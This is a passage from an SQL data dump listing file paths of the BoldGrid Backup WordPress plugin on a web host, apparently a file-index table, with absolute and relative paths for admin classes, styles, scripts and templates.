feature/class-speed-coach.php'),(255,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/card/feature/class-timely-auto-updates.php','wp-content/plugins/boldgrid-backup/admin/card/feature/class-timely-auto-updates.php'),(256,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/card/feature/class-versions.php','wp-content/plugins/boldgrid-backup/admin/card/feature/class-versions.php'),(257,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-archive-actions.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-archive-actions.php'),(258,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-archive-browser.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-archive-browser.php'),(259,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-archive-details.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-archive-details.php'),(260,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-archive-fail.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-archive-fail.php'),(261,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-archive-log.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-archive-log.php'),(262,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-archive.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-archive.php'),(263,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-archiver-cancel.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-archiver-cancel.php'),(264,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-archiver-utility.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-archiver-utility.php'),(265,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-archives-all.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-archives-all.php'),(266,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-archives.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-archives.php'),(267,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-auto-rollback.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-auto-rollback.php'),(268,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-auto-updates.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-auto-updates.php'),(269,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-backup-dir.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-backup-dir.php'),(270,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-cli.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-cli.php'),(271,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-compressor.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-compressor.php'),(272,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-compressors.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-compressors.php'),(273,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-config.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-config.php'),(274,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-core-files.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-core-files.php'),(275,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-core.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-core.php'),(276,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-cron-log.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-cron-log.php'),(277,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-cron-test.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-cron-test.php'),(278,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-cron.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-cron.php'),(279,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-crypt.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-crypt.php'),(280,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-dashboard-widget.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-dashboard-widget.php'),(281,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-dashboard.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-dashboard.php'),(282,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-db-dump.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-db-dump.php'),(283,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-db-get.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-db-get.php'),(284,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-db-import.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-db-import.php'),(285,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-db-omit.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-db-omit.php'),(286,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-email.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-email.php'),(287,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-environment.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-environment.php'),(288,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-filelist-analyzer.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-filelist-analyzer.php'),(289,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-filelist.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-filelist.php'),(290,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-folder-exclusion.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-folder-exclusion.php'),(291,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-go-pro.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-go-pro.php'),(292,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-home-dir.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-home-dir.php'),(293,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-in-progress-data.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-in-progress-data.php'),(294,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-in-progress-tmp.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-in-progress-tmp.php'),(295,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-in-progress.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-in-progress.php'),(296,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-jobs.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-jobs.php'),(297,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-log-page.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-log-page.php'),(298,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-log.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-log.php'),(299,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-nopriv.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-nopriv.php'),(300,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-notice.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-notice.php'),(301,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-plugin-notices.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-plugin-notices.php'),(302,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-plugins.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-plugins.php'),(303,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-premium-features.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-premium-features.php'),(304,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-remote.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-remote.php'),(305,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-restore-git.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-restore-git.php'),(306,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-restore-helper.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-restore-helper.php'),(307,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-scheduler.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-scheduler.php'),(308,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-settings.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-settings.php'),(309,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-support.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-support.php'),(310,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-task-helper.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-task-helper.php'),(311,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-task.md','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-task.md'),(312,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-task.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-task.php'),(313,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-test.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-test.php'),(314,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-time.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-time.php'),(315,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-tools.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-tools.php'),(316,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-transfers.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-transfers.php'),(317,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-upload.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-upload.php'),(318,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-usage.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-usage.php'),(319,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-utility.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-utility.php'),(320,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-wp-cron.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-wp-cron.php'),(321,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-wpcli.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-wpcli.php'),(322,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-xhprof.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin-xhprof.php'),(323,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin.php','wp-content/plugins/boldgrid-backup/admin/class-boldgrid-backup-admin.php'),(324,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/class-cron.php','wp-content/plugins/boldgrid-backup/admin/class-cron.php'),(325,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/compressor/class-boldgrid-backup-admin-compressor-pcl-zip.php','wp-content/plugins/boldgrid-backup/admin/compressor/class-boldgrid-backup-admin-compressor-pcl-zip.php'),(326,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/compressor/class-boldgrid-backup-admin-compressor-php-zip.php','wp-content/plugins/boldgrid-backup/admin/compressor/class-boldgrid-backup-admin-compressor-php-zip.php'),(327,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/compressor/class-boldgrid-backup-admin-compressor-system-zip-temp-folder.php','wp-content/plugins/boldgrid-backup/admin/compressor/class-boldgrid-backup-admin-compressor-system-zip-temp-folder.php'),(328,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/compressor/class-boldgrid-backup-admin-compressor-system-zip-test.php','wp-content/plugins/boldgrid-backup/admin/compressor/class-boldgrid-backup-admin-compressor-system-zip-test.php'),(329,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/compressor/class-boldgrid-backup-admin-compressor-system-zip.php','wp-content/plugins/boldgrid-backup/admin/compressor/class-boldgrid-backup-admin-compressor-system-zip.php'),(330,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/cron/class-crontab.php','wp-content/plugins/boldgrid-backup/admin/cron/class-crontab.php'),(331,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/cron/entry/class-base.php','wp-content/plugins/boldgrid-backup/admin/cron/entry/class-base.php'),(332,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/cron/entry/class-crontab.php','wp-content/plugins/boldgrid-backup/admin/cron/entry/class-crontab.php'),(333,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/cron/entry/class-entry.php','wp-content/plugins/boldgrid-backup/admin/cron/entry/class-entry.php'),(334,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/cron/entry/class-wpcron.php','wp-content/plugins/boldgrid-backup/admin/cron/entry/class-wpcron.php'),(335,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-customizer.css','wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-customizer.css'),(336,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-dashboard.css','wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-dashboard.css'),(337,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-folder-exclude.css','wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-folder-exclude.css'),(338,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-ftp-settings.css','wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-ftp-settings.css'),(339,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-hide-all.css','wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-hide-all.css'),(340,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-home.css','wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-home.css'),(341,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-new-thickbox-style.css','wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-new-thickbox-style.css'),(342,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-premium.css','wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-premium.css'),(343,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-settings.css','wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-settings.css'),(344,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-test.css','wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-test.css'),(345,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-zip-browser.css','wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin-zip-browser.css'),(346,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin.css','wp-content/plugins/boldgrid-backup/admin/css/boldgrid-backup-admin.css'),(347,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/image/db-lock-64.png','wp-content/plugins/boldgrid-backup/admin/image/db-lock-64.png'),(348,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/image/icon-128x128.png','wp-content/plugins/boldgrid-backup/admin/image/icon-128x128.png'),(349,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/image/remote/amazon-s3-logo.png','wp-content/plugins/boldgrid-backup/admin/image/remote/amazon-s3-logo.png'),(350,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/image/remote/dreamhost-logo.png','wp-content/plugins/boldgrid-backup/admin/image/remote/dreamhost-logo.png'),(351,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/image/remote/google-drive-logo.png','wp-content/plugins/boldgrid-backup/admin/image/remote/google-drive-logo.png'),(352,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/image/remote/google-drive.png','wp-content/plugins/boldgrid-backup/admin/image/remote/google-drive.png'),(353,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/index.php','wp-content/plugins/boldgrid-backup/admin/index.php'),(354,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-archive-actions.js','wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-archive-actions.js'),(355,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-archive-details.js','wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-archive-details.js'),(356,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-backup-now.js','wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-backup-now.js'),(357,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-customizer.js','wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-customizer.js'),(358,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-folder-exclude.js','wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-folder-exclude.js'),(359,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-ftp-settings.js','wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-ftp-settings.js'),(360,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-home.js','wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-home.js'),(361,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-in-progress.js','wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-in-progress.js'),(362,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-logs.js','wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-logs.js'),(363,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-rollback.js','wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-rollback.js'),(364,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-settings-autoupdate.js','wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-settings-autoupdate.js'),(365,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-settings.js','wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-settings.js'),(366,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-table-includes.js','wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-table-includes.js'),(367,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-update-selectors.js','wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-update-selectors.js'),(368,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-zip-browser.js','wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin-zip-browser.js'),(369,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin.js','wp-content/plugins/boldgrid-backup/admin/js/boldgrid-backup-admin.js'),(370,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/orphan/README.md','wp-content/plugins/boldgrid-backup/admin/orphan/README.md'),(371,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/orphan/class-cleanup.php','wp-content/plugins/boldgrid-backup/admin/orphan/class-cleanup.php'),(372,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/orphan/class-finder.php','wp-content/plugins/boldgrid-backup/admin/orphan/class-finder.php'),(373,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/archive-details/browser-entry.php','wp-content/plugins/boldgrid-backup/admin/partials/archive-details/browser-entry.php'),(374,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/archive-details/browser.php','wp-content/plugins/boldgrid-backup/admin/partials/archive-details/browser.php'),(375,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/archive-details/db.php','wp-content/plugins/boldgrid-backup/admin/partials/archive-details/db.php'),(376,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/archive-details/details.php','wp-content/plugins/boldgrid-backup/admin/partials/archive-details/details.php'),(377,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/archive-details/not-found.php','wp-content/plugins/boldgrid-backup/admin/partials/archive-details/not-found.php'),(378,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/archive-details/only-remote.php','wp-content/plugins/boldgrid-backup/admin/partials/archive-details/only-remote.php'),(379,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/archive-details/remote-storage.php','wp-content/plugins/boldgrid-backup/admin/partials/archive-details/remote-storage.php'),(380,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/archives/add-new.php','wp-content/plugins/boldgrid-backup/admin/partials/archives/add-new.php'),(381,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/archives/note-pre-backup.php','wp-content/plugins/boldgrid-backup/admin/partials/archives/note-pre-backup.php'),(382,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/backup-now-modal/title.php','wp-content/plugins/boldgrid-backup/admin/partials/backup-now-modal/title.php'),(383,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-archive-details.php','wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-archive-details.php'),(384,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-backup-button.php','wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-backup-button.php'),(385,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-backup-modal.php','wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-backup-modal.php'),(386,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-backup.php','wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-backup.php'),(387,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-dashboard.php','wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-dashboard.php'),(388,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-home.php','wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-home.php'),(389,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-mail-restore.php','wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-mail-restore.php'),(390,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-nav.php','wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-nav.php'),(391,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-premium.php','wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-premium.php'),(392,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-settings.php','wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-settings.php'),(393,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-support.php','wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-support.php'),(394,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-test.php','wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-test.php'),(395,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-tools.php','wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-tools.php'),(396,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-transfers.php','wp-content/plugins/boldgrid-backup/admin/partials/boldgrid-backup-admin-transfers.php'),(397,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/remote/ftp.php','wp-content/plugins/boldgrid-backup/admin/partials/remote/ftp.php'),(398,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/remote/local.php','wp-content/plugins/boldgrid-backup/admin/partials/remote/local.php'),(399,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/settings/auto-backup.php','wp-content/plugins/boldgrid-backup/admin/partials/settings/auto-backup.php'),(400,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/settings/auto-update.php','wp-content/plugins/boldgrid-backup/admin/partials/settings/auto-update.php'),(401,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/settings/backup-directory.php','wp-content/plugins/boldgrid-backup/admin/partials/settings/backup-directory.php'),(402,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/settings/backup-logs.php','wp-content/plugins/boldgrid-backup/admin/partials/settings/backup-logs.php'),(403,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/settings/backup-security.php','wp-content/plugins/boldgrid-backup/admin/partials/settings/backup-security.php'),(404,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/settings/compressor.php','wp-content/plugins/boldgrid-backup/admin/partials/settings/compressor.php'),(405,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/settings/connect-key.php','wp-content/plugins/boldgrid-backup/admin/partials/settings/connect-key.php'),(406,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/settings/days-of-week.php','wp-content/plugins/boldgrid-backup/admin/partials/settings/days-of-week.php'),(407,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/settings/db.php','wp-content/plugins/boldgrid-backup/admin/partials/settings/db.php'),(408,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/settings/folders.php','wp-content/plugins/boldgrid-backup/admin/partials/settings/folders.php'),(409,'/home/eckank5/public_html/wp-content/plugins/boldgrid-backup/admin/partials/settings/notifications.php','wp-content/plugins/boldgrid-backup/admin/partials/settings/notifications.php'),(410,'/